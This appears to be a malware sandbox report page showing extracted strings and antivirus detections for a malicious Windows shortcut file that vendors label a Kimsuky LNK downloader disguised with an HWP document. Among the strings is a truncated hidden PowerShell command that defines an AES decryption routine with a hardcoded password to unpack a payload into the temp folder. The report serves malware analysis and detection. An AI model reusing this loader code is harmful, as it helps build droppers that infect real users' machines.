popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
%windir%\system32\cmd.exe
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HWP Document File
wWK5Qo;o?
qM}DA*
#/,PEZ
578"7H
#+1siN
iF-0H/
V&u\Oe
4vhKXf%
zf4-|:$
Q'B3C"
U}]JsJ
b>. B/
B2'eLn
B%oLj2`r
]R<vTd
~e69!=
"CBU)I
M)Qr)U
.XG^:8
V'=Ow|}lo
%P,y<J
kd1 (,W
e@eu9DR
}QnkdI
i`"phh*
(hx<OmF
Amgwaj
wX>(hN
1Sm{#V
3qsP$P%Q,1&
{Iekli
2o_f4t
n)k5yD
T/A6Z&>
$`^NBj}
c M]qT
QX5; ;
y|Kem]
NU($FzK
Tu-//#
a}\c/?
WOoo?v
JOlK@5
Y,'7GeD
1qK&Lm
b<0hh*K
BX?Fe+
Fy2)6
H!7n_F4t
2KHHIF
-CSF%Yl6
$`\N\j~
sJK$SMW
~=>Ju`r
E,Q,N%
0tH(=,V
nqPi(!
o76{}M
x?&JUI
IYN&9b
eAfPOd
wnS9%Kq
&F5Dk
kgjblsdfefrkjsdfsjkh
AType: Text Document
Size: 5.23 KB
Date modified: 01/02/2020 11:23
/c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = '%temp%';Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$
.\100.hwp
%windir%\system32\cmd.exe
Root Entry
FileHeader
HwpSummaryInformation
DocInfo
BodyText
Section0
BinData
BIN0001.JPG
BIN0002.JPG
9, 1, 1, 5656 PolarisOffice_
5:23:00
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Dropper.tx
ALYac Trojan.Agent.LNK.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Scr.Mallnk!gen13
ESET-NOD32 LNK/Kimsuky.H
TrendMicro-HouseCall Clean
Avast LNK:Agent-IL [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Multi.Powecod.i
BitDefender Heur.BZC.YAX.Boxter.812.EAA66D53
NANO-Antivirus Clean
ViRobot LNK.S.Downloader.1097498
MicroWorld-eScan Heur.BZC.YAX.Boxter.812.EAA66D53
Tencent Clean
TACHYON Clean
Sophos Troj/LnkObf-T
F-Secure Clean
DrWeb LNK.Downloader.469
VIPRE Heur.BZC.YAX.Boxter.812.EAA66D53
TrendMicro Clean
FireEye Heur.BZC.YAX.Boxter.812.EAA66D53
Emsisoft Trojan.PowerShell.Gen (A)
huorong TrojanDownloader/LNK.Agent.co
GData Heur.BZC.YAX.Boxter.812.EAA66D53
Jiangmin Clean
Varist PSH/Boxter.A
Avira Clean
Antiy-AVL Clean
Kingsoft Script.Troj.CMDLnk.22143
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.YAX.Boxter.812.E9AA812D
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Multi.Powecod.i
Microsoft Clean
Google Detected
AhnLab-V3 Downloader/LNK.Powershell.S2543
Acronis Clean
McAfee Clean
MAX malware (ai score=81)
VBA32 Trojan.Link.Crafted
Zoner Clean
Rising Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet LNK/Kimsuky.GOSU!tr
BitDefenderTheta Clean
AVG LNK:Agent-IL [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.